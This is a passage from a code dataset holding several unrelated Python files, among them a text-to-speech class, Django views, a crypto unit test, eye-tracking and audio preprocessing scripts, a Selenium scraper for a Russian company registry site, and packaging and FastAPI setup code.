c)\n","repo_name":"maisalobao/Python","sub_path":"pythonProject/desafio096.py","file_name":"desafio096.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"19036670576","text":"import logging\n\nfrom core import AudioPlayer\nfrom tts import TTS\n\nlogging.basicConfig()\nlogger = logging.getLogger(\"kalliope\")\n\n\nclass Voicerss(TTS):\n TTS_LANGUAGES_DEFAULT = 'fr-fr'\n TTS_URL = \"http://www.voicerss.org/controls/speech.ashx\"\n TTS_CONTENT_TYPE = \"audio/mpeg\"\n TTS_TIMEOUT_SEC = 30\n\n def __init__(self):\n TTS.__init__(self)\n\n def say(self, words=None, language=TTS_LANGUAGES_DEFAULT, cache=True):\n self.say_generic(cache, language, words, self.get_audio_voicerss, AudioPlayer.PLAYER_MP3, AudioPlayer.AUDIO_MP3_44100_FREQUENCY)\n\n def get_audio_voicerss(self, **kwargs):\n words = kwargs.get('words', None)\n cache = kwargs.get('cache', None)\n file_path = kwargs.get('file_path', None)\n language = kwargs.get('language', None)\n payload = Voicerss.get_payload(language, words)\n\n return TTS.get_audio(file_path, cache, payload, self.TTS_URL)\n\n @staticmethod\n def get_payload(language, words):\n return {\n \"src\": words,\n \"hl\": language,\n \"c\": \"mp3\"\n }\n","repo_name":"alexena/kalliope","sub_path":"tts/voicerss/voicerss.py","file_name":"voicerss.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"73899063440","text":"# coding: utf-8\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\n# Create your views here.\n\nfrom django.db import models\nfrom wiki.models import NamePart\nfrom wiki.models import Rozdil\nfrom wiki.models import Stats\n\n\ndef index(request):\n foo = []\n for name_part in NamePart.objects.all():\n foo.append({'name_part': name_part,'rozdils': Rozdil.objects.filter(part_of=name_part.pk)})\n\n context = {'foo': foo }\n\n return render(request,'index.html',context)\n\n\ndef all_rozdil(request,is_main):\n foo = []\n for name_part in NamePart.objects.all():\n foo.append({'name_part': name_part,'rozdils': Rozdil.objects.filter(part_of=name_part.pk)})\n stats = Stats.objects.all().filter(main_is_id=is_main)\n rozdil = Rozdil.objects.all()\n title_rozdil = Rozdil.objects.get(pk=is_main)\n context = {'stats':stats,'rozdil': rozdil,'title_rozdil':title_rozdil , 'foo': foo }\n\n return render(request,'stats.html',context)\n\ndef detali(request,id_ekz):\n foo = []\n for name_part in NamePart.objects.all():\n foo.append({'name_part': name_part,'rozdils': Rozdil.objects.filter(part_of=name_part.pk)})\n\n\n# Вивід бокового меню в деталях (потрійне вкладення)\n wiki_tree = []\n for name_part in NamePart.objects.all():\n rozdil_sub_tree = []\n for rozdil in Rozdil.objects.filter(part_of=name_part.pk):\n rozdil_sub_tree.append({\n 'rozdil': rozdil,\n 'stat_list': Stats.objects.filter(main_is=rozdil.pk)})\n\n wiki_tree.append({\n 'name_part': name_part,\n 'rozdil_list': rozdil_sub_tree,\n })\n\n\n details = Stats.objects.get(pk=id_ekz)\n rozdil = Rozdil.objects.all()\n context = {'details':details,'rozdil': rozdil,'foo': foo,'wiki_tree':wiki_tree }\n\n return render(request,'details.html',context)\n","repo_name":"BlastPy/tgv","sub_path":"wiki/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20387368079","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\ntest_esek\n----------------------------------\n\nTests for `esek` module.\n\"\"\"\n\nfrom kiteclient.openstack.common.crypto import utils as cryptoutils\nfrom kiteclient.tests import base\nfrom kiteclient.tests.v1 import utils\nfrom kiteclient.v1 import esek\nfrom kiteclient.v1 import key\n\nimport base64\n\nimport six\n\n\nclass TestEsek(base.TestCase):\n\n def setUp(self):\n super(base.TestCase, self).setUp()\n key_ses = utils.DummyKeyResponse(gen=20)\n\n skey_data = \"gTqLlW7x2oyNi3k+9YXTpQ==\"\n self.srckey = key.Key('testkey', skey_data, session=key_ses)\n\n dkey_data = \"uoUUn/+ZL+hNUwJ0cxTScg==\"\n self.dstkey = key.Key('destkey', dkey_data, session=key_ses)\n\n self.skey = \"uZnhYaRtzA7QdnDN1hVSWw==\"\n self.ekey = \"fAlG9eGL44ew6q8uTMMKJw==\"\n\n self.esek_data = (\n \"LZ6WWNvCot49sEhnwn0Is/xGWYGQF72rCw8emEKHGmZpDcSQ4K0c5Ld0+fmR\"\n \"T8PjzozEzWK97gNJQHZWSAh1JhmvMO+bjkUNlEdepOjTXrIW6QxdNvMY+Bkd\"\n \"dDwrkKga4wZnoGgeMgK+B7cdGsQ8yAPE3vDjbpmIOvHjHXniCUs=\")\n\n def _encrypt(self, data):\n crypto = cryptoutils.SymmetricCrypto(enctype='AES',\n hashtype='SHA256')\n enc = crypto.encrypt(base64.b64decode(self.ekey),\n six.b(data), b64encode=True)\n sig = crypto.sign(base64.b64decode(self.skey),\n six.b(data), b64encode=True)\n return enc, sig\n\n def test_integrity(self):\n esek_obj = esek.Esek(self.srckey.key_name,\n self.dstkey,\n self.esek_data)\n b64_sig_key = base64.b64encode(esek_obj.sig_key)\n b64_enc_key = base64.b64encode(esek_obj.enc_key)\n self.assertEqual(six.b(self.skey), b64_sig_key)\n self.assertEqual(six.b(self.ekey), b64_enc_key)\n\n def test_decryption(self):\n esek_obj = esek.Esek(self.srckey.key_name,\n self.dstkey,\n self.esek_data)\n\n message = \"MESSAGE\"\n enc, sig = self._encrypt(message)\n new_message = esek_obj.decrypt(enc, sig)\n self.assertEqual(six.b(message), new_message)\n\n def test_bad_signature_throws(self):\n esek_obj = esek.Esek(self.srckey.key_name,\n self.dstkey,\n self.esek_data)\n message = \"MESSAGE\"\n enc, _ = self._encrypt(message)\n sig = \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=\"\n self.assertRaises(ValueError, esek_obj.decrypt, enc, sig)","repo_name":"jamielennox/python-kiteclient","sub_path":"kiteclient/tests/v1/test_esek.py","file_name":"test_esek.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7037858491","text":"import os\nimport numpy as np\nimport json\nfrom asc2array import asc2array\nimport glob\n \nfolderName = glob.glob(\"./results/*\")\nfolderName.sort()\n\ndatHash={\"PDR\":[],\n \"PDR_baseline\":[],\n \"gazeX\":[],\n \"gazeY\":[],\n # 'mSaccade':[],\n \"sub\":[],\n \"numOfSwitch\":[],\n \"RT\":[],\n \"Blink\" : [],\n \"Saccade\":[],\n \"rejectFlag\":[],\n \"taskTimeLen\":[],\n \"jitter\":[],\n \"start_end\":[], \n \"data_x\":[],\n \"data_x_queue\":[],\n # \"ampOfSaccade\":[]\n }\n\ncfg={'THRES_DIFF':10,\n 'WID_ANALYSIS':4,\n 'useEye':2,\n 'WID_FILTER':[],\n 'mmFlag':False,\n 'normFlag':True,\n # 'mmFlag':True,\n # 'normFlag':False,\n 's_trg':[],\n 'visualization':False,\n 'MS':False\n }\n\n\nfor iSub,subName in enumerate(folderName):\n fileName = glob.glob(os.path.join(subName+'/*.asc'))\n \n f = open(os.path.join(str(fileName[0])))\n \n dat=[]\n for line in f.readlines():\n dat.append(line.split())\n \n f.close()\n \n eyeData,events,initialTimeVal,fs = asc2array(dat, cfg)\n \n pupilData = eyeData['pupilData']\n gazeX = eyeData['gazeX']\n gazeY = eyeData['gazeY']\n # mSaccade = eyeData['MS']\n datHash['rejectFlag'].append(eyeData['rejectFlag'])\n \n start_trial = [[int(int(e[0])- initialTimeVal),e[1]] for e in events['MSG'] if e[1] == 'Start_Pesentation']\n end_trial = [[int(int(e[0])- initialTimeVal),e[1]] for e in events['MSG'] if e[1] == 'End_Pesentation']\n\n datHash['start_end'].append([[s[0],e[0]] for s,e in zip(start_trial,end_trial)])\n \n events_queue = [[int(int(e[0])- initialTimeVal),e[1]] for e in events['MSG'] if e[1] == 'task_queue']\n events_response = [[int(int(e[0])- initialTimeVal),e[1]] for e in events['MSG'] if e[1] == '0' or e[1] == '1' or e[1] == '2' or e[1] == '3' or e[1] == '4' or e[1] == '5']\n \n rejectNum_res = []\n rejectNum_queue = []\n for i in np.arange(len(events_queue)-1):\n tmp = []\n for j in np.arange(len(events_response)):\n if events_queue[i] < events_response[j] and events_response[j] < events_queue[i+1]:\n tmp.append(j)\n if len(tmp) > 1:\n for k in np.arange(len(tmp)-1):\n rejectNum_res.append(tmp[k])\n # rejectNum_res.append(tmp[:-1])\n elif len(tmp) == 0:\n rejectNum_queue.append(i)\n \n if events_queue[-1][0] > events_response[-1][0]:\n rejectNum_queue.append(len(events_queue)-1)\n \n events_response = [p for i,p in enumerate(events_response) if not i in rejectNum_res ]\n events_queue = [p for i,p in enumerate(events_queue) if not i in rejectNum_queue ]\n \n \n flg = True\n for iTrial in np.arange(len(events_queue)):\n for st in start_trial:\n if abs(int(events_queue[iTrial][0])-int(st[0])) < 9500:\n datHash[\"taskTimeLen\"].append(int(events_queue[iTrial][0])-int(st[0]))\n flg = False\n if flg:\n datHash[\"taskTimeLen\"].append(int(events_queue[iTrial][0])-int(events_response[iTrial-1][0]))\n else:\n flg = True\n \n \n\n ### for heatmap, blink and saccade\n endISI = [[int(int(e[0])- initialTimeVal),e[1]] for e in events['MSG'] if e[1] == 'ISI']\n event_data = {'EFIX':[],'ESACC':[],'EBLINK':[]}\n mmName = list(event_data.keys())\n for mm in mmName:\n for i in np.arange(len(events_queue)): \n tmp = []\n for e in events[mm]:\n if i == len(events_queue)-1:\n if int(e[1])-initialTimeVal > events_queue[i][0] and int(e[1])-initialTimeVal < endISI[-1][0]:\n if e[0] == 'L':\n e[1] = int(e[1])-initialTimeVal-events_queue[i][0]\n e[2] = int(e[2])-initialTimeVal-events_queue[i][0]\n tmp.append(e)\n else:\n if int(e[1])-initialTimeVal > events_queue[i][0] and int(e[1])-initialTimeVal < events_queue[i+1][0]:\n if e[0] == 'L':\n e[1] = int(e[1])-initialTimeVal-events_queue[i][0]\n e[2] = int(e[2])-initialTimeVal-events_queue[i][0]\n tmp.append(e)\n event_data[mm].append(tmp)\n \n for e in event_data['EBLINK']: \n datHash['Blink'].append([[e_data[1],e_data[2],e_data[3]] for e_data in e])\n for e in event_data['ESACC']: \n datHash['Saccade'].append([[e_data[2],e_data[8]] for e_data in e])\n \n tmp_numOfSwitch = np.array([int(r[1]) for r in events_response])\n timeLen = int(cfg['WID_ANALYSIS']*fs)\n \n for i,r in enumerate(events_queue):\n datHash['PDR'].append(pupilData[r[0]-timeLen:r[0]])\n \n sTime = 4\n eTime = 5\n for i,r in enumerate(events_response):\n tmp = pupilData[(r[0]-int(sTime*fs)):(r[0]+int(eTime*fs))]\n tmp_gazeX = gazeX[(r[0]-int(sTime*fs)):(r[0]+int(eTime*fs))]\n tmp_gazeY = gazeY[(r[0]-int(sTime*fs)):(r[0]+int(eTime*fs))]\n # tmp_mSaccade = mSaccade[(r[0]-int(sTime*fs)):(r[0]+int(eTime*fs))]\n \n if len(tmp) == int((sTime+eTime)*fs):\n datHash['PDR_baseline'].append(tmp)\n datHash['gazeX'].append(tmp_gazeX)\n datHash['gazeY'].append(tmp_gazeY)\n # datHash['mSaccade'].append(tmp_mSaccade)\n else:\n datHash['PDR_baseline'].append(np.zeros(int((sTime+eTime)*fs)))\n datHash['gazeX'].append(np.zeros(int((sTime+eTime)*fs)))\n datHash['gazeY'].append(np.zeros(int((sTime+eTime)*fs)))\n # datHash['mSaccade'].append(np.zeros(int((sTime+eTime)*fs)))\n \n for que,res in zip(events_queue,events_response):\n datHash['RT'].append((res[0]-que[0])/fs)\n \n \n ############ # of switch #########################\n datHash['numOfSwitch'] = np.r_[datHash['numOfSwitch'], tmp_numOfSwitch]\n \n datHash['sub'] = np.r_[datHash['sub'],np.ones(len(events_queue))*(iSub+1)]\n \n x = [e[0] for e in events_response]\n datHash[\"data_x\"] = np.r_[datHash[\"data_x\"],x]\n \n x = [e[0] for e in events_queue]\n datHash[\"data_x_queue\"] = np.r_[datHash[\"data_x_queue\"],x]\n # datHash['numOfBlink'] = np.r_[datHash['numOfBlink'], np.array(event_data['numOfEBLINK'])]\n # datHash['numOfSaccade'] = np.r_[datHash['numOfSaccade'], np.array(event_data['numOfESACC'])]\n # datHash['ampOfSaccade'] = np.r_[datHash['ampOfSaccade'], np.array(event_data['ampOfESACC'])]\n\ndatHash['PDR'] = np.array(datHash['PDR']).tolist()\ndatHash['gazeX'] = np.array(datHash['gazeX']).tolist()\ndatHash['gazeY'] = np.array(datHash['gazeY']).tolist()\n\ndatHash['PDR_baseline'] = np.array(datHash['PDR_baseline']).tolist()\n\nmmName = list(datHash.keys())\nfor mm in mmName:\n if not isinstance(datHash[mm],list):\n datHash[mm] = datHash[mm].tolist()\n\nif not cfg['mmFlag'] and not cfg['normFlag']:\n with open(os.path.join(\"./data/data_original_au.json\"),\"w\") as f:\n json.dump(datHash,f)\n\nelif cfg['mmFlag'] and not cfg['normFlag']:\n with open(os.path.join(\"./data/data_original_mm.json\"),\"w\") as f:\n json.dump(datHash,f)\n\nelse:\n with open(os.path.join(\"./data/data_original_norm.json\"),\"w\") as f:\n json.dump(datHash,f)\n","repo_name":"suzuki970/PupilAuditoryStreaming","sub_path":"[Python]PreProcessing/Exp1/parseData.py","file_name":"parseData.py","file_ext":"py","file_size_in_byte":7337,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"20214019099","text":"import argparse\nimport os\nfrom typing import List, Union\n\nimport librosa\nimport soundfile\n\n\ndef resample_wav(\n root: str, ori_data_list: List[str], target_data_path: str, sample_rate: int\n) -> None:\n r\"\"\"Resamples wav files to the target sample rate.\n\n Args:\n root: Path to the root directory of the original .wav data.\n ori_data_list: List of original .wav filenames.\n target_data_path: Target path to save resampled .wav files.\n sample_rate: Target sample rate of the audio.\n \"\"\"\n for ori_wav_name in ori_data_list:\n ori_wav_path = os.path.join(root, ori_wav_name)\n out_path = os.path.join(target_data_path, ori_wav_name)\n ori_wav, _ = librosa.load(ori_wav_path, sr=sample_rate, res_type=\"kaiser_fast\")\n soundfile.write(out_path, ori_wav, samplerate=sample_rate)\n print(\"\\t\", out_path)\n\n\ndef slice_wav_into_segments(\n root: str,\n ori_data_list: List[str],\n target_data_path: str,\n sample_rate: int,\n slice_sec: Union[int, float],\n) -> None:\n r\"\"\"Slice raw waveform into segments according to the target slice seconds.\n\n Args:\n root: Path to the root directory of the original .wav data.\n ori_data_list: List of original .wav filenames.\n target_data_path: Target path to save resampled .wav files.\n sample_rate: Target sample rate of the audio.\n slice_sec: Slice original wav files into segments of this duration. (in seconds)\n \"\"\"\n for ori_wav_name in ori_data_list:\n ori_wav_path = os.path.join(root, ori_wav_name)\n ori_wav, _ = librosa.load(ori_wav_path, sr=sample_rate, res_type=\"kaiser_fast\")\n num_segments = ori_wav.shape[0] // (sample_rate * slice_sec)\n for segment_count in range(num_segments):\n start = segment_count * sample_rate * slice_sec\n end = (segment_count + 1) * sample_rate * slice_sec\n wav_chunk = ori_wav[start:end]\n chunk_name = f\"{ori_wav_name.split('.')[0]}_{segment_count}.wav\"\n chunk_path = os.path.join(target_data_path, chunk_name)\n soundfile.write(chunk_path, wav_chunk, samplerate=sample_rate)\n print(\"\\t\", chunk_path)\n\n\ndef slice_wav_into_breathing_cycle(\n root: str,\n ori_data_list: List[str],\n target_data_path: str,\n ann_txt_path: str,\n sample_rate: int,\n) -> None:\n r\"\"\"Slice raw waveform into small chunks according to breathing cycle start-end time and extract crackle and wheeze labels.\n\n Args:\n root: Path to the root directory of the original .wav data.\n ori_data_list: List of original .wav filenames.\n target_data_path: Target path to save resampled .wav files.\n ann_txt_path: Path that contains original .txt annotation files.\n sample_rate: Target sample rate of the audio.\n\n Output:\n Save wav chunk as: `TARGETPATH/OriginalFilename_CycleCount_Crackle_Wheeze.wav`.\n\n For example,\n `226_1b1_Pl_sc_LittC2SE_2_10.wav` represents the second cycle of the original `226_1b1_Pl_sc_LittC2SE.wav`, with crackle = 1, wheeze = 0.\n \"\"\"\n for ori_wav_name in ori_data_list:\n ori_wav_path = os.path.join(root, ori_wav_name)\n ori_wav, _ = librosa.load(ori_wav_path, sr=sample_rate, res_type=\"kaiser_fast\")\n ori_ann = os.path.join(ann_txt_path, ori_wav_name.replace(\"wav\", \"txt\"))\n ann_list = open(ori_ann, \"r\").readlines()\n\n for cycle_count, annotation in enumerate(ann_list):\n marker = annotation.replace(\"\\n\", \"\").split(\"\\t\")\n start = int(float(marker[0]) * sample_rate)\n end = int(float(marker[1]) * sample_rate)\n crackle = int(marker[2])\n wheeze = int(marker[3])\n wav_chunk = ori_wav[start : end + 1]\n chunk_name = f'{ori_wav_name.replace(\".wav\", \"\")}_{cycle_count}_{crackle}{wheeze}.wav'\n chunk_path = os.path.join(target_data_path, chunk_name)\n soundfile.write(chunk_path, wav_chunk, samplerate=sample_rate)\n\n\ndef args_parser() -> argparse.Namespace:\n r\"\"\"Parses command line arguments.\"\"\"\n parser = argparse.ArgumentParser(description=\"Prepare data for training.\")\n parser.add_argument(\n \"--ori_data_path\",\n type=str,\n required=True,\n metavar=\"PATH\",\n help=\"Path that contains original .wav files.\",\n )\n parser.add_argument(\n \"--output_path\",\n type=str,\n required=True,\n metavar=\"PATH\",\n help=\"Target path to save .wav chunks.\",\n )\n parser.add_argument(\n \"--ori_txt_path\",\n type=str,\n default=None,\n metavar=\"PATH\",\n help=\"Path that contains original .txt annotation files. Note: can be the same folder as original .wav\",\n )\n parser.add_argument(\n \"--slice\",\n action=\"store_true\",\n help=\"Slice original wav files into chunks\",\n )\n parser.add_argument(\n \"--target-sample-rate\",\n type=int,\n default=16000,\n help=\"Target sample rate of the audio. (default: 16000)\",\n )\n parser.add_argument(\n \"--slice_sec\",\n type=Union[float, int],\n default=8,\n help=\"Slice original wav files into segments of this duration. (in seconds, default: 8)\",\n )\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n args = args_parser()\n\n ori_data_list = filter(\n lambda file: file.endswith(\".wav\"), os.listdir(args.ori_data_path)\n )\n\n if not os.path.exists(args.output_path):\n os.makedirs(args.output_path)\n\n if args.slice:\n print(f\"Slice original wav files into chunks...\")\n if args.ori_txt_path is None:\n slice_wav_into_segments(\n root=args.ori_data_path,\n ori_data_list=ori_data_list,\n target_data_path=args.output_path,\n sample_rate=args.target_sample_rate,\n slice_sec=args.slice_sec,\n )\n else:\n slice_wav_into_breathing_cycle(\n root=args.ori_data_path,\n ori_data_list=ori_data_list,\n target_data_path=args.output_path,\n ann_txt_path=args.ori_txt_path,\n sample_rate=args.target_sample_rate,\n )\n else:\n resample_wav(\n root=args.ori_data_path,\n ori_data_list=ori_data_list,\n target_data_path=args.output_path,\n sample_rate=args.target_sample_rate,\n )\n","repo_name":"lunayht/UNOprocess","sub_path":"icbhi_data/prep_data.py","file_name":"prep_data.py","file_ext":"py","file_size_in_byte":6463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17701620894","text":"# -*- coding: utf-8 -*-\n\"\"\"\n load data from csv file\n\"\"\"\nfrom collections import Counter\nimport numpy as np\n\n\ndef csv_dataloader(input_file):\n \"\"\"\n\n :param input_file:\n :return:\n \"\"\"\n X = []\n y = []\n with open(input_file, 'r') as f_in:\n line = f_in.readline()\n while line:\n if line.startswith('Flow'):\n line = f_in.readline()\n line_arr = line.split(',')\n X.append(line_arr[7:40])\n if line_arr[-1] == '2\\n':\n y.append('1')\n else:\n y.append('0')\n\n line = f_in.readline()\n\n X = np.asarray(X, dtype=float)\n y = np.asarray(y, dtype=int)\n print(Counter(y))\n\n return (X, y)\n","repo_name":"kun0906/one_class_classification_legacy","sub_path":"Utilities/CSV_Dataloader.py","file_name":"CSV_Dataloader.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"38607378221","text":"from ast import pattern\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nimport re\n\n\ndef init_driver():\n # init webdriver firefox\n options = webdriver.FirefoxOptions()\n options.set_preference(\n \"general.useragent.override\",\n \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0\",\n )\n options.set_preference(\"dom.webdriver.enabled\", False)\n options.headless = True\n return webdriver.Firefox(\n executable_path=\"driver/geckodriver\",\n options=options\n )\n\n\ndef init_wait(driver):\n return WebDriverWait(driver, 3)\n\n\ndef element_is_exist(by, path, wait):\n try:\n # driver.find_element(by, path)\n wait.until(EC.presence_of_element_located((by, path)))\n return True\n except Exception:\n return False\n\n\ndef auth(driver, wait, mail, password):\n # Находим конпку для авторизации\n button = wait.until(EC.presence_of_element_located((By.CLASS_NAME, 'login-tools__user')))\n button.click()\n # Находим поля мыла и пароля\n mail_field = wait.until(EC.presence_of_element_located((By.ID, \"mw-l_mail\")))\n password_field = driver.find_element(By.ID, 'mw-l_pass')\n\n mail_field.send_keys(mail)\n password_field.send_keys(password)\n # Кнопка заверешения авторизации\n login_button = driver.find_element(By.ID, \"mw-l_entrance\")\n login_button.click()\n\n # если появляется дурацкое окно\n if element_is_exist(By.XPATH, \"/html/body/div[5]/div/div/div/div/div[6]\", wait):\n skip_button = wait.until(EC.presence_of_element_located((By.XPATH, \"/html/body/div[5]/div/div/div/div/div[6]\")))\n skip_button.click()\n return True\n\n return True\n\n\ndef get_data(driver, wait, inn_code):\n data = {}\n\n # Делаем query-запрос на руспрофайл с данным ИНН\n try:\n driver.get(url=f'https://www.rusprofile.ru/search?query={inn_code}&type=ul')\n except Exception as e:\n print(e)\n return None\n\n # Проверяем страничку, выданную поиском\n\n # Поиск ОПФ, названия организации\n pattern = re.compile(r\"(\\S+?)\\s*(\\\"*[\\w\\s\\d-]*?\\\"*)\")\n org_name = pattern.search(driver.find_element(By.CSS_SELECTOR, \".company-header>.company-header__row>h1\").text)\n print(org_name.group())\n opf = org_name.group(1)\n data.update({\"opf\": opf})\n organization = org_name.group(2)\n data.update({\"organization\": organization})\n\n # Поиск мыла\n if element_is_exist(By.CSS_SELECTOR, \".mail>.light\", wait): # Если мыла нет вообще\n email = \"-\"\n else:\n email = driver.find_element(By.CSS_SELECTOR, \".mail>span>a\").text\n\n data.update({\"email\": email})\n\n # Поиск директора\n director = driver.find_element(By.XPATH,\n \"/html/body/div[2]/div/div/div[2]/div[1]/div[1]/div/div/div[2]/div[1]/div[3]/span[3]\").text\n data.update({\"director\": director})\n\n # Поиск адреса\n address = driver.find_element(By.XPATH, \"//*[@id='anketa']/div[2]/div[1]/div[2]/address/span[2]\").text\n data.update({\"address\": address})\n\n # Поиск телефона\n if element_is_exist(By.CSS_SELECTOR, \".phone>.light\", wait): # Если номероов нет вообще\n phones = None\n elif element_is_exist(By.XPATH,\n \"/html/body/div[2]/div/div/div[2]/div[1]/div[1]/div/div/div[2]/div[2]/div[3]/div[1]/div/span[4]/button\", wait): # Если есть кнопка \"Ещё N номеров\"\n phones = []\n\n more_button = driver.find_element(By.XPATH,\n \"/html/body/div[2]/div/div/div[2]/div[1]/div[1]/div/div/div[2]/div[2]/div[3]/div[1]/div/span[4]/button\")\n more_button.click()\n\n first_phones = driver.find_elements(By.CSS_SELECTOR, \".phone>span>a\")\n hidden_phones = driver.find_elements(By.CSS_SELECTOR, \".phone>.hidden-text>span>a\")\n\n for item in first_phones:\n phones += [item.text]\n for item in hidden_phones:\n phones += [item.text]\n else:\n phones = []\n\n first_phones = driver.find_elements(By.CSS_SELECTOR, \".phone>span>a\")\n\n for item in first_phones:\n phones += [item.text]\n\n data.update({\"phones\": phones})\n\n return data\n\n\n\n","repo_name":"E6YJI6EK/rusprofile-parser","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23409381327","text":"# Always prefer setuptools over distutils\nfrom setuptools import setup, find_packages\n# To use a consistent encoding\nfrom codecs import open\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='weixin',\n version='0.1.0',\n\n description='A weixin api project',\n long_description=long_description,\n\n url='https://github.com/ujsxn/weixin',\n\n author='Nan Xiang',\n author_email='514580344@qq.com',\n\n license='GPLv3',\n\n classifiers=[\n # 3 - Alpha\n # 4 - Beta\n # 5 - Production/Stable\n 'Development Status :: 3 - Alpha',\n\n 'Intended Audience :: Developers',\n 'Topic :: Software Development',\n 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',\n 'Programming Language :: Python :: 2.7',\n ],\n\n keywords='weixin wechat api',\n\n packages=find_packages(exclude=['docs', 'tests']),\n\n install_requires=['requests', 'redis'],\n\n)","repo_name":"ujsxn/weixin","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36702543492","text":"from argparse import ArgumentParser\n\nimport mmcv\n\nimport mmcv_custom # noqa: F401,F403\nimport mmseg_custom # noqa: F401,F403\nfrom mmseg.apis import inference_segmentor, init_segmentor, show_result_pyplot\nfrom mmseg.core.evaluation import get_palette\nfrom mmcv.runner import load_checkpoint\nfrom mmseg.core import get_classes\nimport cv2\nimport os.path as osp\nimport glob\n\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument('config', help='Config file')\n parser.add_argument('checkpoint', help='Checkpoint file')\n parser.add_argument('img_dir', help='Image file')\n parser.add_argument('val_list', help='Validation list')\n\n parser.add_argument('--out', type=str, default=\"inference\", help='out dir')\n parser.add_argument(\n '--device', default='cuda:0', help='Device used for inference')\n parser.add_argument(\n '--palette',\n default='cityscapes',\n help='Color palette used for segmentation map')\n parser.add_argument(\n '--opacity',\n type=float,\n default=0.5,\n help='Opacity of painted segmentation map. In (0, 1] range.')\n args = parser.parse_args()\n\n # build the model from a config file and a checkpoint file\n \n model = init_segmentor(args.config, checkpoint=None, device=args.device)\n checkpoint = load_checkpoint(model, args.checkpoint, map_location='cpu')\n if 'CLASSES' in checkpoint.get('meta', {}):\n model.CLASSES = checkpoint['meta']['CLASSES']\n else:\n model.CLASSES = get_classes(args.palette)\n \n f = open(args.val_list, 'r')\n for line in f.readlines():\n line = line.strip()\n # for img in glob.glob(args.img_dir + line + '.jpeg'):\n img = args.img_dir + line + '.jpeg'\n # test a single image\n result = inference_segmentor(model, img)\n # show the results\n if hasattr(model, 'module'):\n model = model.module\n # img = model.show_result(args.img, result,\n # palette=get_palette(args.palette),\n # show=False, opacity=args.opacity)\n\n classes = ('cloudy', 'uncertain clear', 'probably clear', 'confident clear')\n palette = [[255, 0, 0], [0, 255, 0], [0, 0, 255], [128, 128, 0]]\n # RED, GREEN, BLUE, YELLOW\n \n result = model.show_result(img, result,\n palette = palette,\n show=False, opacity=args.opacity)\n\n mmcv.mkdir_or_exist(args.out)\n out_path = osp.join(args.out, osp.basename(img))\n cv2.imwrite(out_path, result)\n print(f\"Result is save at {out_path}\")\n # changed\n\nif __name__ == '__main__':\n main()","repo_name":"Jaehoon-zx/ViT-Adapter-Segmentation","sub_path":"segmentation/image_demo.py","file_name":"image_demo.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9665041527","text":"# Image subtraction \r\n# Created by Korn Visaltanachoti\r\n\r\nfrom PIL import Image\r\n\r\n# Open the two input images\r\nimage1 = Image.open(\"15.jpg\")\r\nimage2 = Image.open(\"14.jpg\")\r\n\r\n# Ensure both images are the same size\r\nif image1.size != image2.size:\r\n raise ValueError(\"Input images must be the same size\")\r\n\r\n# Create a new image for the output\r\noutput = Image.new(image1.mode, image1.size)\r\n\r\n# Perform image subtraction\r\nfor x in range(image1.width):\r\n for y in range(image1.height):\r\n pixel1 = image1.getpixel((x, y))\r\n pixel2 = image2.getpixel((x, y))\r\n if pixel1 == pixel2:\r\n output.putpixel((x, y), (0, 0, 0))\r\n else:\r\n output.putpixel((x, y), pixel1)\r\n\r\n# Save the output image\r\noutput.save(\"output.jpg\")\r\n","repo_name":"Mhonns/HydroponicPowerPlant","sub_path":"ImageProcessing/ImageSub.py","file_name":"ImageSub.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41295772451","text":"from fastapi import FastAPI, Depends\nfrom fastapi.middleware.cors import CORSMiddleware\n\nfrom .core.bing import BingMiddleware\nfrom .core.startup import startup_event_handler\nfrom .core.config import settings\n# from .core.auth import verify_api_key # deprecated\nfrom .routers import api\n\nfrom square_auth.auth import Auth\nauth = Auth()\n\ndef get_app():\n app = FastAPI(title=\"SQuARE Datastore API\",\n dependencies=[Depends(auth)],\n openapi_url=settings.OPENAPI_URL)\n\n app.add_middleware(\n CORSMiddleware,\n 